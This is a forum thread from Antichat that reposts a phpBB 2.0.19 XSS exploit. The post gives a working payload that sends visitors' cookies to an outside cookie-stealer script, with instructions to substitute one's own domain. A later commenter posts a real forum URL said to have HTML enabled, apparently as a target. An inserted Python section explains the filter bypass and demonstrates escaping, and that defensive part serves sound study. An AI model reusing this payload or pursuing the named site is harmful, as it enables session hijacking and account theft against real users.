ANTICHAT Forum


TANZWUT 31.01.2006 13:55

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
 
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitrary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horizontally equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cook ie' b='<pre' >

[урл]http://www.somesite.com/[/урл]</pre>

Write "урл" in English letters - url :)

Source: _http://ivdb.org/poc/1236.htm
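
Why a filter that judges each `<...>` chunk on its own misses the markup in the post above, next to a quote-aware check and the "HTML off" rendering. This is an added example, not code from the original post or from phpBB. It assumes the filter ends a tag at the first `>`; the allow-list, the function names and the sample post (same shape, harmless `alert(1)` handler) are constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "pre"}  # assumed allow-list of formatting tags

# Hypothetical naive filter: a tag ends at the first '>' and is judged alone.
NAIVE_TAG = re.compile(r"<(/?)(\w+)([^>]*)>")

def naive_filter_accepts(post: str) -> bool:
    """True if every '<...>' chunk is an allowed tag with no on* attribute."""
    for m in NAIVE_TAG.finditer(post):
        if m.group(2).lower() not in ALLOWED_TAGS:
            return False
        if re.search(r"\bon\w+\s*=", m.group(3), re.I):
            return False
    return True

class HandlerAudit(HTMLParser):
    """Quote-aware pass: a '>' inside a quoted value does not end the tag."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append((tag, None))
        # Event-handler attributes are never acceptable in user posts.
        self.findings += [(tag, n) for n, _ in attrs if n.startswith("on")]

def audit(post: str) -> list:
    parser = HandlerAudit()
    parser.feed(post)
    parser.close()
    return parser.findings

def render_html_off(post: str) -> str:
    """What 'HTML off' amounts to: every metacharacter becomes an entity."""
    return html.escape(post, quote=True)

# Constructed sample with the same shape as the post above, harmless handler.
SAMPLE = "<pre a='>' onmouseover='alert(1)' b='<pre' >text</pre>"

if __name__ == "__main__":
    print("naive filter accepts:", naive_filter_accepts(SAMPLE))
    print("quote-aware findings:", audit(SAMPLE))
    print("HTML off rendering:  ", render_html_off(SAMPLE))
```

The tokenizer here is Python's, not a browser's, so a production sanitizer should re-serialize output from the parsed tree rather than pass the original string through.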

syntacsis 31.01.2006 17:43

Is this one of those that only work when HTML is enabled? "As long as html is ON in the latest version of phpBB forums..." What does he mean?

madnet 31.01.2006 18:16

The problem is that HTML has to be enabled on the forum, but it is disabled by default and I have yet to come across forums where it is allowed, so...

xpi100 10.06.2008 20:15

html on bbcode on
http://contacti-bg.free.bg/cgi-php/phpbb2

xpi100 10.06.2008 20:18
